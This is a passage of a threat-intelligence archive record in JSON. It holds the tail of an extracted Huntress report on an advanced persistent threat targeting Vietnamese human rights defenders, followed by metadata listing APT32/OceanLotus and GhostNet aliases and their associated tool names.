Acquire\r\nInfrastructure:\r\nServer\r\nT1583.001: Acquire\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 28 of 29\n\nIndicator MITRE ATT\u0026CK Note\r\nInfrastructure:\r\nDomains\r\nSource: https://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 29 of 29", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders" ], "report_names": [ "advanced-persistent-threat-targeting-vietnamese-human-rights-defenders" ], "threat_actors": [ { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3cc6c262-df23-4075-a93f-b496e8908eb2", "created_at": "2022-10-25T16:07:23.682239Z", "updated_at": "2026-04-10T02:00:04.708878Z", "deleted_at": null, "main_name": "GhostNet", "aliases": [ "GhostNet", "Snooping Dragon" ], "source_name": "ETDA:GhostNet", "tools": [ "AngryRebel", "Farfli", "Gh0st RAT", "Gh0stnet", "Ghost RAT", "Ghostnet", "Moudour", "Mydoor", "PCRat", "Remosh", "TOM-Skype" ], "source_id": "ETDA", "reports": null }, { "id": "e91dae30-a513-4fb1-aace-4457466313b3", "created_at": "2023-01-06T13:46:38.974913Z", "updated_at": "2026-04-10T02:00:03.168521Z", "deleted_at": null, "main_name": "GhostNet", "aliases": [ "Snooping Dragon" ], "source_name": "MISPGALAXY:GhostNet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": [ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2439ad53-39cc-4fff-8fdf-4028d65803c0", "created_at": "2022-10-25T16:07:23.353204Z", "updated_at": "2026-04-10T02:00:04.55407Z", "deleted_at": null, "main_name": "APT 32", "aliases": [ "APT 32", "APT-C-00", "APT-LY-100", "ATK 17", "G0050", "Lotus Bane", "Ocean Buffalo", "OceanLotus", "Operation Cobalt Kitty", "Operation PhantomLance", "Pond Loach", "SeaLotus", "SectorF01", "Tin Woodlawn" ], "source_name": "ETDA:APT 32", "tools": [ "Agentemis", "Android.Backdoor.736.origin", "AtNow", "Backdoor.MacOS.OCEANLOTUS.F", "BadCake", "CACTUSTORCH", "CamCapture Plugin", "CinaRAT", "Cobalt Strike", "CobaltStrike", "Cuegoe", "DKMC", "Denis", "Goopy", "HiddenLotus", "KOMPROGO", "KerrDown", "METALJACK", "MSFvenom", "Mimikatz", "Nishang", "OSX_OCEANLOTUS.D", "OceanLotus", "PHOREAL", "PWNDROID1", "PhantomLance", "PowerSploit", "Quasar RAT", "QuasarRAT", "RatSnif", "Remy", "Remy RAT", "Rizzo", "Roland", "Roland RAT", "SOUNDBITE", "Salgorea", "Splinter RAT", "Terracotta VPN", "Yggdrasil", "cobeacon", "denesRAT", "fingerprintjs2" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775441494, "ts_updated_at": 1775792182, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/852cbe8c6c47d67b263065f52eb34b409d2a4f7a.pdf", "text": "https://archive.orkl.eu/852cbe8c6c47d67b263065f52eb34b409d2a4f7a.txt", "img": "https://archive.orkl.eu/852cbe8c6c47d67b263065f52eb34b409d2a4f7a.jpg" } }